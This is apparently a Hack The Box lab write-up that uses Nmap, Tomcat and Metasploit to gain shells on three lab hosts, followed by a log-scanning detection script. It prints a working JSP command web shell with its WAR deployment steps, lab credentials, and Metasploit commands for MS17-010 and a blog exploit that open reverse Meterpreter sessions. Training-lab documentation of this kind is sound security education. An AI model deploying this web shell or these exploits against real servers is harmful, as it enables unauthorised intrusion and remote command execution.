HTB Shells & Payloads Live Engagement write-up


This write-up details the steps taken during a Live Engagement from the Shells & Payloads module in the HTB Pentester Job Role Path.
Question 1: What is the hostname of Host-1? (Format: all lower case)
To find the hostname of Host-1, an Nmap scan was performed on the IP address 172.16.1.11. The Nmap output revealed details about the host, including its NetBIOS computer name and DNS computer name.
$ sudo nmap -sV -sC 172.16.1.11
The scan results showed the NetBIOS Computer Name as "SHELLS-WINSVR" and the DNS Computer Name as "shells-winsvr".
Answer: shells-winsvr
Question 2: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)
The Nmap scan on Host-1 indicated that Apache Tomcat 10.0.11 was running on port 8080. Firefox was opened with the firefox command and the Tomcat page on port 8080 was loaded; its "Manager App" button led to the admin panel. Admin credentials for Tomcat were found on the desktop: tomcat:Tomcatadm.
A JSP web shell was created to be deployed on the Tomcat server. The content of the shell.jsp file was:
<%@ page import="java.io.*" %>
<%
    // Read the command from the ?cmd= parameter submitted by the form below.
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
        BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
        BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
        String s;
%>
<pre>
<b>Output:</b>
<%
        while ((s = stdInput.readLine()) != null) {
            out.println(s);
        }
%>
<b>Errors:</b>
<%
        while ((s = stdError.readLine()) != null) {
            out.println(s);
        }
%>
</pre>
<%
    }
%>
<form method="GET">
    <input name="cmd" type="text">
    <input type="submit" value="Run">
</form>
The shell.jsp file was then packaged into a .war file using the command:
jar -cvf shell.war shell.jsp
This shell.war file was uploaded via the Tomcat admin panel (the deploy section).
After successful deployment, the web shell was accessed by navigating to 172.16.1.11:8080/shell/shell.jsp in Firefox. To find the folder name in C:\Shares\, the dir C:\Shares\ command was executed through the web shell.
Answer: dev-share
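As an added detection-side example (not part of the original write-up), the following Python script scans Tomcat access-log lines for the two steps of the chain above: a WAR upload through the Manager app, followed by requests to a .jsp carrying a cmd parameter. The log lines, addresses and file names in it are constructed for the example, and it assumes Tomcat's default AccessLogValve "common" log pattern.

```python
"""Flag Tomcat access-log lines matching the Manager-deployed JSP web shell chain.
Added example (not from the original write-up); the log lines below are constructed."""
import re
from urllib.parse import parse_qs, urlparse
# Tomcat AccessLogValve "common" pattern: host ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Parameter names used by simple command web shells ("cmd" is the one on this page).
SHELL_PARAMS = {"cmd", "command", "exec"}

def classify(line):
    """Return (severity, reason) for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    url = urlparse(m["path"])
    path = url.path.lower()
    params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
    # Step 1 of the chain: a WAR deployed through the Manager app's upload form.
    if path.startswith("/manager/html/upload") and m["method"] in ("POST", "PUT"):
        return "medium", f"WAR upload via Manager app by {m['user']} from {m['src']}"
    # Step 2: a JSP that accepts a command parameter and answers 200.
    hit = params & SHELL_PARAMS
    if path.endswith(".jsp") and hit and m["status"] == "200":
        return "high", f"command parameter {sorted(hit)} sent to {url.path} from {m['src']}"
    return None

def scan(lines):
    """Return [(severity, reason, line)] for every suspicious line, preserving order."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((verdict[0], verdict[1], line.rstrip("\n")))
    return hits

# Constructed sample log lines (not from any real engagement).
SAMPLE_LOG = [
    '172.16.1.5 - tomcat [12/Jan/2024:10:02:11 +0000] "GET /manager/html HTTP/1.1" 200 18321',
    '172.16.1.5 - tomcat [12/Jan/2024:10:03:40 +0000] "POST /manager/html/upload HTTP/1.1" 303 -',
    '172.16.1.5 - - [12/Jan/2024:10:04:02 +0000] "GET /shell/shell.jsp?cmd=dir+C%3A%5CShares%5C HTTP/1.1" 200 512',
    '172.16.1.20 - - [12/Jan/2024:10:04:10 +0000] "GET /docs/index.jsp HTTP/1.1" 200 7740',
]

if __name__ == "__main__":
    for sev, why, raw in scan(SAMPLE_LOG):
        print(f"[{sev}] {why}\n    {raw}")
```

Pairing a Manager upload and a command-bearing .jsp request from the same source within minutes, as in the sample, is the strongest signal; either alone warrants a look at what is deployed under webapps.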
Question 3: What distribution of Linux is running on Host-2? (Format: distro name, all lower case)
First, the IP address of Host-2 was identified as 172.16.1.12 by inspecting the /etc/hosts file. An Nmap scan was then performed on this IP address:
sudo nmap -sV -sC 172.16.1.12
The Nmap scan results for port 22 (SSH) indicated OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0). The HTTP service on port 80 also showed Apache/2.4.41 (Ubuntu).
Answer: ubuntu
Question 4: What language is the shell written in that gets uploaded when using the 50064.rb exploit?
To determine the language of the shell uploaded by the 50064.rb exploit, the exploit script was downloaded and examined:
searchsploit -m 50064
cat 50064.rb
Analysis of the 50064.rb file revealed that the shell it uploads is written in PHP.
Answer: php
Question 5: Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt
The 50064.rb exploit was copied to the Metasploit modules directory:
sudo cp 50064.rb /usr/share/metasploit-framework/modules/exploits/linux/http
Metasploit was then used to exploit the target. The following commands were executed within msf6:
msf6 > use exploits/linux/http/50064
msf6 exploit(linux/http/50064) > set RHOSTS 172.16.1.12
msf6 exploit(linux/http/50064) > set USERNAME admin
msf6 exploit(linux/http/50064) > set PASSWORD admin123!@#
msf6 exploit(linux/http/50064) > set VHOST blog.inlanefreight.local
msf6 exploit(linux/http/50064) > exploit
It was important to set VHOST to blog.inlanefreight.local, since the blog is served by name rather than by IP address.
After successfully gaining a Meterpreter session, the contents of /customscripts/flag.txt were retrieved using cat /customscripts/flag.txt.
Question 6: What is the hostname of Host-3?
An Nmap scan was conducted on Host-3, which has the IP address 172.16.1.13 (retrieved from the /etc/hosts file):
sudo nmap -sV -sC 172.16.1.13
The Nmap results, specifically the smb-os-discovery and nbstat scripts, identified the NetBIOS computer name as "SHELLS-WINBLUE".
Answer: SHELLS-WINBLUE
Question 7: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
Given the Windows Server 2016 version identified by the Nmap scan (Windows Server 2016 Standard 14393) and the hostname "SHELLS-WINBLUE", it was suspected that the machine was vulnerable to EternalBlue. The Metasploit module exploit/windows/smb/ms17_010_psexec was used:
use exploit/windows/smb/ms17_010_psexec
set LHOST 172.16.1.5
set RHOSTS 172.16.1.13
exploit
It was crucial to set LHOST to the IP address of the ens224 interface, the one facing the target network.
After obtaining a Meterpreter session, the contents of C:\Users\Administrator\Desktop\Skills-flag.txt were retrieved.